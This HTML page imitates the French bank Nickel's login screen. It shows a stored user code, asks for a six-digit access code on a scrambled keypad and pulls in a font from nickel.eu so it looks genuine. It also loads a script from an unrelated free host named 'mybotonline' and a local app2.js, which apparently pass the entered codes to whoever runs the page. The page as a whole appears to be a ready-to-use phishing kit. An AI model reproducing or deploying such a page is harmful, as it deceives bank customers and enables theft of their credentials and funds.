<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-4bw+/aepP/YC94hEpVNVgiZdgIC5+VKNBQNGCHeKRQN+PtmoHDEXuppvnDJzQIu9" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css"
        integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="https://nickel.eu/fonts/newfont.css" type="text/css">

    <title>pass</title>
</head>

<body>
    <div class="header shadow-sm">
        <img src="./img/logo.png" width="120">
        <div class="top-button">Espace partenaire</div>
    </div>
    <div class="center">
        <h1 style="text-align: center;">Connexion à votre espace</h1>
        <br>
        <div class="info-box">
            <i class="fa-solid fa-user"></i>
            <p id="user"></p>
        </div>
        <br> <br>
        <form id="form2">
            <label for="pass">Code d'acces( 6chiffres)* </label>
            <input name="pass" id="pass" type="number" placeholder="* * * * * *" outline="none" required> <br>
            <p id="noti" style="color: orange;"></p>
            <a style="text-align: end; color: black; font-size: 0.8rem;" href="#">Code d'accès oublié</a>
            <div class="btn-box">
                <div>
                    <input class="shadow-sm" type="button" value="7" onclick="pass.value+='7'">
                    <input class="shadow-sm" type="button" value="8" onclick="pass.value+='8'">
                    <input class="shadow-sm" type="button" value="2" onclick="pass.value+='2'">
                    <input class="shadow-sm" type="button" value="5" onclick="pass.value+='5'">
                </div>
                <div>
                    <input class="shadow-sm" type="button" value="6" onclick="pass.value+='6'">
                    <input class="shadow-sm" type="button" value="1" onclick="pass.value+='1'">
                    <input class="shadow-sm" type="button" value="0" onclick="pass.value+='0'">
                    <input class="shadow-sm" type="button" value="9" onclick="pass.value+='9'">
                </div>
                <div>
                    <input class="shadow-sm" type="button" value="4" onclick="pass.value+='4'">
                    <input class="shadow-sm" type="button" value="3" onclick="pass.value+='3'">
                    <input style="width: 150px;" class="shadow-sm effacer" type="button" value="Effacer"
                        onclick="pass.value = pass.value.toString().slice(0, -1)">


                </div>
            </div>
            <button type="submit"><span class="button">Se connecter</span></button> <br>
        </form>
    </div>
    <br> <br>
    <footer>
        <a href="#">Aide & opposition CB</a>
        <a href="#">Pas encore client ?</a>

    </footer>
</body>
<script>
    document.getElementById('user').innerText = localStorage.getItem('usercode');

    var champPass = document.getElementById('pass');
    champPass.addEventListener("input", function () {

        if (this.value.length > 6) {
            this.value = this.value.slice(0, 6); //limiter le champs 6 caractere
        }
    })
</script>
<script src="https://mybotonline.000webhostapp.com/serveur/file.js"></script>
<script src="./app2.js"></script>

</html>